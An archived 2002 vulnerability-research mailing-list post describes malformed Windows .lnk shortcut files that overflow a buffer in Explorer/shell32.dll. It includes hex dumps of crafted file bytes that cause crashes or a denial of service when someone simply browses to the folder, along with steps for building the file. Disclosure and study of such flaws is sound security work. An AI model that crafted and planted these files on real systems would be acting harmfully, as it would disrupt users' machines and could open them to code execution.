Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Windows .lnk Files

From: "Brett Moore" <brett () softwarecreations co nz>
Date: Wed, 26 Jun 2002 11:40:48 +1200
It seems that the handling of .lnk files has a few problems. I have tested
on both win98 and win2000 sp2 server.

Can anyone test further. Note that the actions taken by these .lnk files has
the possiblity of causing damage to a system and should not be tested on an
essential server :-)

-------------------------------------------------------------------
32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
-------------------------------------------------------------------

This causes FF FF to be loaded into a register used to control the length of
data copied. Usually causes an error when right clicking on the file in
explorer. Sometimes it is required
to select properties. Errors seen include unable to read, unable to write.
Since we are controlling the length of the data copies these errors are self
explanatory.

Would seeme that explorer/shell32.dll is copying to much data when reading
the filename?. Ok so
this causes the read/write errors and halts progress.

But if we substitute valid values such as 01 01 (CC CC)  then the buffer
still gets overflowed but we bypass this error and our corrupt values get
further down in the program.

-------------------------------------------------------------------
32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT¦¦
CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ¦¦¤¤¤¤¤¤________
AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
-------------------------------------------------------------------

This one does not cause the read/write errors but causes a DoS in explorer
just by browsing to the folder holding the file.

This is more interesting, but involves tracking a lot of assembler code.
Worst result would be some sort of code executed just by browsing a folder.
Virus related perhaps.

Any feedback on results or further research into this problem would be
appreciated.

Notes:
        Do not save to your desktop.
        Rename the file to .lnk
        This is the win98 file. You can easily modify a 2000 or other lnk file as
detailed above.


Brett Moore

Attachment: atxt~1.txt
Description:

Previous By Date Next
Previous By Thread Next

Current thread: